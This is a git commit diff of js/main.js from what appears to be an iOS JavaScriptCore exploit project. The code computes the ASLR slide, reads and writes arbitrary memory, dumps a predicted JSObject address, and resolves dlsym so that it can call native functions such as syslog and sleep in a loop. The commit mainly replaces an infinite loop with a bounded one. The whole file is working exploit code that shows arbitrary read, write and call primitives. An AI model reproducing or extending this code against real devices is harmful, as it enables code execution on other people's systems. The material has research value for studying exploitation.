From 6cc37a8aba5368bfe5e56725382268e517d96b03 Mon Sep 17 00:00:00 2001 From: spv Date: Wed, 20 Apr 2022 15:22:48 -0400 Subject: function all the things --- js/main.js | 144 +++++++++++++++++++++++++++++++------------------------------ 1 file changed, 73 insertions(+), 71 deletions(-) (limited to 'js/main.js') diff --git a/js/main.js b/js/main.js index 11bd185..0a75b38 100644 --- a/js/main.js +++ b/js/main.js @@ -1,71 +1,73 @@ -var MAX_SLIDE = 0x3; -var MIN_SLIDE = 0x1; - -try { - log("we out here in jsc"); -} catch (e) { - /* - * we don't have log. :( - */ - - log = function (){}; -} - -function main() { - /* - * get slide and calculate slid base - * remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's - * - * so, take the slide, shift it by 12 bits (aslr is calc'd by taking a - * random byte and shifting it 12 bits, in this case the page size, 4096 - * (0x1000) bytes), and add it to the unslid base. - */ - - slide = get_our_slide(); - base = 0x4000 + (slide << 12); - slid = (slide << 12); - // call(0x41424344); - - log("slide=0x" + slide.toString(16)); - log("*(uint8_t*)base = 0x" + read_u8(base).toString(16)); - log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); - log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); - - write_u32(0x144444, 0x69691337); - - log("writing to first mapped loc"); -// write_u32(0x422300, 0x41414141); - log("writing to second mapped loc"); -// write_u32(0x422300, 0x41414141); - log("survived both writes!"); - - child.a = parent; - - predicted_jsobject_addy = 0x422200; - buf = read_buf(predicted_jsobject_addy, 0x200); - - log("hexdump of predicted jsobject loc:"); - log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x")); - - var dlsym_addy = read_u32(0x1a0000 + 24 + slid); - var shc_slide = read_u32(0x1a0000 + 20 + slid); - write_str(0x148000, "get rekt from jsc\0"); - write_str(0x149000, "syslog\0"); - write_str(0x14a000, "sleep\0"); - while (true) { - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, 0x2, 0x3); - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 10, 0x1, 0x2, 0x3); - } -/* - for (i = 0; i < 0x1000; i++) { - call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); - }*/ - -// call(0x9ac54 + (slide << 12)); -// write_u32(0x1013b8, 0x41414141); -// call(0x41414141); - -// call(0x56ab9 + (slide << 12)); - - log("still alive"); -}; +var MAX_SLIDE = 0x3; +var MIN_SLIDE = 0x1; + +try { + log("we out here in jsc"); +} catch (e) { + /* + * we don't have log. :( + */ + + log = function (){}; +} + +function main() { + /* + * get slide and calculate slid base + * remember, 32-bit *OS defaults to 0x4000 for the unslid base for exec's + * + * so, take the slide, shift it by 12 bits (aslr is calc'd by taking a + * random byte and shifting it 12 bits, in this case the page size, 4096 + * (0x1000) bytes), and add it to the unslid base. + */ + + slide = get_our_slide(); + base = 0x4000 + (slide << 12); + slid = (slide << 12); +// call(0x41424344); + + log("slide=0x" + slide.toString(16)); + log("*(uint8_t*)base = 0x" + read_u8(base).toString(16)); + log("*(uint16_t*)base = 0x" + read_u16(base).toString(16)); + log("*(uint32_t*)base = 0x" + read_u32(base).toString(16)); + + write_u32(0x144444, 0x69691337); + + log("writing to first mapped loc"); +// write_u32(0x422300, 0x41414141); + log("writing to second mapped loc"); +// write_u32(0x422300, 0x41414141); + log("survived both writes!"); + + child.a = parent; + + predicted_jsobject_addy = 0x422200; + buf = read_buf(predicted_jsobject_addy, 0x200); + + log("hexdump of predicted jsobject loc:"); + log(hexdump(buf, 8, 2, predicted_jsobject_addy, 8, "0x")); + + var dlsym_addy = read_u32(0x1a0000 + 24 + slid); + var shc_slide = read_u32(0x1a0000 + 20 + slid); + write_str(0x148000, "get rekt from jsc %d\0"); + write_str(0x149000, "syslog\0"); + write_str(0x14a000, "sleep\0"); +// while (true) { +// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, 0x2, 0x3); +// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 10, 0x1, 0x2, 0x3); +// } + + for (var i = 0; i < 0x1000; i++) { + call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x28, 0x148000, i, 0x3); + call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x14a000, 0, 0), 10, 0x1, 0x2, 0x3); +// call4arg(call4arg(dlsym_addy + shc_slide, 0xfffffffe, 0x149000, 0, 0), 0x148000, i, 0x2, 0x3); + } + +// call(0x9ac54 + (slide << 12)); +// write_u32(0x1013b8, 0x41414141); +// call(0x41414141); + +// call(0x56ab9 + (slide << 12)); + + log("still alive"); +}; -- cgit v1.2.3